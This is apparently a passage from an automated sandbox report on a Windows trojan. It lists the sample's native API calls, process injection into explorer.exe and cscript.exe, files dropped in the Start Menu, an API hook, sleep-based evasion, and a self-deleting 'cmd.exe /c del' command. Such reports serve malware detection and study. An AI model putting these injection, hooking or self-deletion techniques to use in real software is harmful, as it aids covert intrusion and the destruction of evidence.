      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046DFF405_2_046DFF40
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04711FC65_2_04711FC6
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471F8725_2_0471F872
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046698705_2_04669870
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0467B8705_2_0467B870
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046D58705_2_046D5870
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046638005_2_04663800
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_047178F35_2_047178F3
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_047118DA5_2_047118DA
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046D98B25_2_046D98B2
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046A59C05_2_046A59C0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0467FAA05_2_0467FAA0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471FA895_2_0471FA89
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471FB2E5_2_0471FB2E
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0469DB195_2_0469DB19
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046F1B805_2_046F1B80
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AE0FD5_2_021AE0FD
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AD5A65_2_021AD5A6
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AE8215_2_021AE821
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_02199E5B5_2_02199E5B
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_02199E605_2_02199E60
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_02192FB05_2_02192FB0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_02192D905_2_02192D90
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_02192D875_2_02192D87
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AEDE35_2_021AEDE3
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: String function: 3425E692 appears 86 times
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: String function: 3426EF10 appears 105 times
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: String function: 34225050 appears 36 times
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: String function: 34237BE4 appears 97 times
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: String function: 341DB910 appears 272 times
      Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0464B910 appears 275 times
      Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 046CE692 appears 86 times
      Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 046DEF10 appears 105 times
      Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 046A7BE4 appears 99 times
      Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04695050 appears 56 times
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222C30 NtMapViewOfSection,LdrInitializeThunk,2_2_34222C30
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222C50 NtUnmapViewOfSection,LdrInitializeThunk,2_2_34222C50
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222CF0 NtDelayExecution,LdrInitializeThunk,2_2_34222CF0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_34222D10
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222DA0 NtReadVirtualMemory,LdrInitializeThunk,2_2_34222DA0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_34222DC0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222E50 NtCreateSection,LdrInitializeThunk,2_2_34222E50
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_34222EB0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222ED0 NtResumeThread,LdrInitializeThunk,2_2_34222ED0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222F00 NtCreateFile,LdrInitializeThunk,2_2_34222F00
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342229F0 NtReadFile,LdrInitializeThunk,2_2_342229F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222A80 NtClose,LdrInitializeThunk,2_2_34222A80
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222B10 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_34222B10
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_34222B90
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_34222BC0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342234E0 NtCreateMutant,2_2_342234E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34224570 NtSuspendThread,2_2_34224570
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34224260 NtSetContextThread,2_2_34224260
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222C20 NtSetInformationFile,2_2_34222C20
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34223C30 NtOpenProcessToken,2_2_34223C30
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222C10 NtOpenProcess,2_2_34222C10
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34223C90 NtOpenThread,2_2_34223C90
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222CD0 NtEnumerateKey,2_2_34222CD0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222D50 NtWriteVirtualMemory,2_2_34222D50
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222E00 NtQueueApcThread,2_2_34222E00
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222E80 NtCreateProcessEx,2_2_34222E80
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222EC0 NtQuerySection,2_2_34222EC0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222F30 NtOpenDirectoryObject,2_2_34222F30
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222FB0 NtSetValueKey,2_2_34222FB0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342238D0 NtGetContextThread,2_2_342238D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342229D0 NtWaitForSingleObject,2_2_342229D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222A10 NtWriteFile,2_2_34222A10
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222AA0 NtQueryInformationFile,2_2_34222AA0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222AC0 NtEnumerateValueKey,2_2_34222AC0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222B20 NtQueryInformationProcess,2_2_34222B20
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222B00 NtQueryValueKey,2_2_34222B00
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222B80 NtCreateKey,2_2_34222B80
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222BE0 NtQueryVirtualMemory,2_2_34222BE0
      Source: C:\Windows\explorer.exeCode function: 4_2_0A72F232 NtCreateFile,4_2_0A72F232
      Source: C:\Windows\explorer.exeCode function: 4_2_0A730E12 NtProtectVirtualMemory,4_2_0A730E12
      Source: C:\Windows\explorer.exeCode function: 4_2_0A730E0A NtProtectVirtualMemory,4_2_0A730E0A
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692C30 NtMapViewOfSection,LdrInitializeThunk,5_2_04692C30
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692CF0 NtDelayExecution,LdrInitializeThunk,5_2_04692CF0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_04692D10
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04692DC0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692E50 NtCreateSection,LdrInitializeThunk,5_2_04692E50
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692F00 NtCreateFile,LdrInitializeThunk,5_2_04692F00
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046929F0 NtReadFile,LdrInitializeThunk,5_2_046929F0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692A80 NtClose,LdrInitializeThunk,5_2_04692A80
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692B00 NtQueryValueKey,LdrInitializeThunk,5_2_04692B00
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04692B10
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_04692BC0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692B80 NtCreateKey,LdrInitializeThunk,5_2_04692B80
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04692B90
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046934E0 NtCreateMutant,LdrInitializeThunk,5_2_046934E0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04694570 NtSuspendThread,5_2_04694570
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04694260 NtSetContextThread,5_2_04694260
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692C50 NtUnmapViewOfSection,5_2_04692C50
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692C20 NtSetInformationFile,5_2_04692C20
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692C10 NtOpenProcess,5_2_04692C10
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692CD0 NtEnumerateKey,5_2_04692CD0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692D50 NtWriteVirtualMemory,5_2_04692D50
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692DA0 NtReadVirtualMemory,5_2_04692DA0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692E00 NtQueueApcThread,5_2_04692E00
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692EC0 NtQuerySection,5_2_04692EC0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692ED0 NtResumeThread,5_2_04692ED0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692EB0 NtProtectVirtualMemory,5_2_04692EB0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692E80 NtCreateProcessEx,5_2_04692E80
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692F30 NtOpenDirectoryObject,5_2_04692F30
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692FB0 NtSetValueKey,5_2_04692FB0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046929D0 NtWaitForSingleObject,5_2_046929D0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692A10 NtWriteFile,5_2_04692A10
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692AC0 NtEnumerateValueKey,5_2_04692AC0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692AA0 NtQueryInformationFile,5_2_04692AA0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692B20 NtQueryInformationProcess,5_2_04692B20
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04692BE0 NtQueryVirtualMemory,5_2_04692BE0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04693C30 NtOpenProcessToken,5_2_04693C30
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04693C90 NtOpenThread,5_2_04693C90
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046938D0 NtGetContextThread,5_2_046938D0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AA360 NtCreateFile,5_2_021AA360
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AA410 NtReadFile,5_2_021AA410
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AA490 NtClose,5_2_021AA490
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AA540 NtAllocateVirtualMemory,5_2_021AA540
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AA53A NtAllocateVirtualMemory,5_2_021AA53A
      Source: MaMsKRmgXZ.exe, 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeskatologiskes outsubtle.exe4 vs MaMsKRmgXZ.exe
      Source: MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MaMsKRmgXZ.exe
      Source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs MaMsKRmgXZ.exe
      Source: MaMsKRmgXZ.exe, 00000002.00000002.9970465329.0000000034480000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MaMsKRmgXZ.exe
      Source: MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs MaMsKRmgXZ.exe
      Source: MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033F81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MaMsKRmgXZ.exe
      Source: MaMsKRmgXZ.exe, 00000002.00000000.9724800728.000000000043A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeskatologiskes outsubtle.exe4 vs MaMsKRmgXZ.exe
      Source: MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs MaMsKRmgXZ.exe
      Source: MaMsKRmgXZ.exe, 00000002.00000003.9889030155.0000000034138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MaMsKRmgXZ.exe
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeSection loaded: edgegdi.dllJump to behavior
      Source: MaMsKRmgXZ.exeStatic PE information: invalid certificate
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile read: C:\Users\user\Desktop\MaMsKRmgXZ.exeJump to behavior
      Source: MaMsKRmgXZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\MaMsKRmgXZ.exe C:\Users\user\Desktop\MaMsKRmgXZ.exe
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeProcess created: C:\Users\user\Desktop\MaMsKRmgXZ.exe C:\Users\user\Desktop\MaMsKRmgXZ.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
      Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeProcess created: C:\Users\user\Desktop\MaMsKRmgXZ.exe C:\Users\user\Desktop\MaMsKRmgXZ.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exeJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe"Jump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403235
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\KoalitionensJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Local\Temp\nsgC13C.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@8/9@24/16
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004044FA
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:304:WilStaging_02
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile written: C:\Users\user\AppData\Local\Temp\reinhold.iniJump to behavior
      Source: MaMsKRmgXZ.exeStatic file information: File size 1239576 > 1048576
      Source: MaMsKRmgXZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: cscript.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9889030155.000000003400B000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033E5E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: MaMsKRmgXZ.exe, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9889030155.000000003400B000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033E5E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe
      Source: Binary string: mshtml.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: cscript.pdb source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.9888945373.0000000005969000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_6EC02F60 push eax; ret 0_2_6EC02F8E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E08CD push ecx; mov dword ptr [esp], ecx2_2_341E08D6
      Source: C:\Windows\explorer.exeCode function: 4_2_0A732B1E push esp; retn 0000h4_2_0A732B1F
      Source: C:\Windows\explorer.exeCode function: 4_2_0A732B02 push esp; retn 0000h4_2_0A732B03
      Source: C:\Windows\explorer.exeCode function: 4_2_0A7329B5 push esp; retn 0000h4_2_0A732AE7
      Source: C:\Windows\explorer.exeCode function: 4_2_119029B5 push esp; retn 0000h4_2_11902AE7
      Source: C:\Windows\explorer.exeCode function: 4_2_11902B1E push esp; retn 0000h4_2_11902B1F
      Source: C:\Windows\explorer.exeCode function: 4_2_11902B02 push esp; retn 0000h4_2_11902B03
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046508CD push ecx; mov dword ptr [esp], ecx5_2_046508D6
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AD4B5 push eax; ret 5_2_021AD508
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AD50B push eax; ret 5_2_021AD572
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AD502 push eax; ret 5_2_021AD508
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021AD56C push eax; ret 5_2_021AD572
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021A0884 push edi; ret 5_2_021A0886
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021A6955 push EB934395h; ret 5_2_021A695A
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_021A0FD6 pushfd ; retf 5_2_021A0FD7
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_6EC01A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6EC01A98
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\KoalitionensJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerensJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Ovariet.Puf73Jump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Megapterine.bucJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Nitzschia.AppJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\BorgerkrigenesJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\FrasefyldtJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\haves.antJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\laggin.telJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\regneoperatorers.txtJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\FeculaeJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae\unintriguing.tieJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-13904
      Source: C:\Windows\explorer.exe TID: 4836Thread sleep count: 111 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4836Thread sleep time: -222000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4836Thread sleep count: 9865 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 4836Thread sleep time: -19730000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exe TID: 4324Thread sleep count: 117 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\cscript.exe TID: 4324Thread sleep time: -234000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exe TID: 4324Thread sleep count: 9850 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\cscript.exe TID: 4324Thread sleep time: -19700000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221763 rdtsc 2_2_34221763
